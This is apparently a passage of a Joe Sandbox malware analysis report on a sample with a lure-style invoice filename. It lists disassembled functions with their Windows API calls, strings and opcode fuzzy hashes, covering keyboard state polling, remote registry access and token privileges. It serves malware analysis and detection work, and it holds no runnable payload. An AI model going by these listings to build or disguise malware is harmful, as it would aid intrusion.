                                                                              • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                              • Opcode Fuzzy Hash: ab5a81ad92dcb896a2cc0bfeaae3a329f7f66724acbb2efb2cb9fd07ffeff384
                                                                              • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00458194
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 2255324689-22481851
                                                                              • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                              • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                              • __wcsicoll.LIBCMT ref: 004585D6
                                                                              • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                              • String ID: ($interface$interface\
                                                                              • API String ID: 2231185022-3327702407
                                                                              • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                              • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2691793716-3771769585
                                                                              • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                              • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                              • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                              • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                              • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                              • __lock.LIBCMT ref: 00416B8A
                                                                              • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                              • __lock.LIBCMT ref: 00416BAB
                                                                              • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                              • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                              • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                              • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                              • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                              Similarity
                                                                              • API ID: MessageSend$CharNext
                                                                              • String ID:
                                                                              • API String ID: 1350042424-0
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                              • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                              • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                              • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                              • GetKeyState.USER32(00000011), ref: 00453D15
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                              • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                              • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                              • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                              • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                              • _wcslen.LIBCMT ref: 00460502
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                              • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                              • String ID: ThumbnailClass
                                                                              • API String ID: 4123061591-1241985126
                                                                              APIs
                                                                                • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                              • ReleaseCapture.USER32 ref: 0046F589
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                              • API String ID: 2483343779-2060113733
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                              • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                              • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                              • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                              • String ID: 2
                                                                              • API String ID: 1331449709-450215437
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: static
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                              • _memcmp.LIBCMT ref: 004394A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                              Strings
                                                                              • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                              • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                              Similarity
                                                                              • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                              • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                              APIs
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                              • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              Similarity
                                                                              • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                              • _memset.LIBCMT ref: 004481BA
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                              • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                              • DeleteObject.GDI32(00630000), ref: 0046EB4F
                                                                              • DestroyIcon.USER32(006C0061), ref: 0046EB67
                                                                              • DeleteObject.GDI32(87251120), ref: 0046EB7F
                                                                              • DestroyWindow.USER32(0041005C), ref: 0046EB97
                                                                              • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                              • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                              Similarity
                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                              • String ID:
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                              • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                              • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                              • GetKeyState.USER32(00000011), ref: 00444E77
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                              • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                              • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                              • _wcslen.LIBCMT ref: 00450944
                                                                              • _wcscat.LIBCMT ref: 00450955
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                              • String ID: -----$SysListView32
                                                                              • API String ID: 4008455318-3975388722
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00448625
                                                                              • CreateMenu.USER32 ref: 0044863C
                                                                              • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                              • IsMenu.USER32(?), ref: 004486EB
                                                                              • CreatePopupMenu.USER32 ref: 004486F5
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                              • DrawMenuBar.USER32 ref: 00448742
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                              • GetParent.USER32 ref: 004692A4
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                              • GetParent.USER32 ref: 004692C7
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                              • GetParent.USER32 ref: 0046949E
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                              • GetParent.USER32 ref: 004694C1
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              APIs
                                                                                • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                              • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                              • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                              Similarity
                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                              • String ID:
                                                                              • API String ID: 3771399671-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3413494760-0
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                              • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: 0%d$DOWN$OFF
                                                                              • API String ID: 3832890014-468733193
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                              • VariantClear.OLEAUT32 ref: 0045E970
                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                              • __swprintf.LIBCMT ref: 0045EB1F
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                              Strings
                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                              Similarity
                                                                              • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 43541914-1568723262
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                              • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: DecrementInterlocked$Sleep
                                                                              • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                              • API String ID: 2250217261-3412429629
                                                                              • Opcode ID: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                              • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                              • Opcode Fuzzy Hash: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                              • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 0-1603158881
                                                                              • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                              • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00479D1F
                                                                              • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                              • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                              • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 665237470-60002521
                                                                              • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                              • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
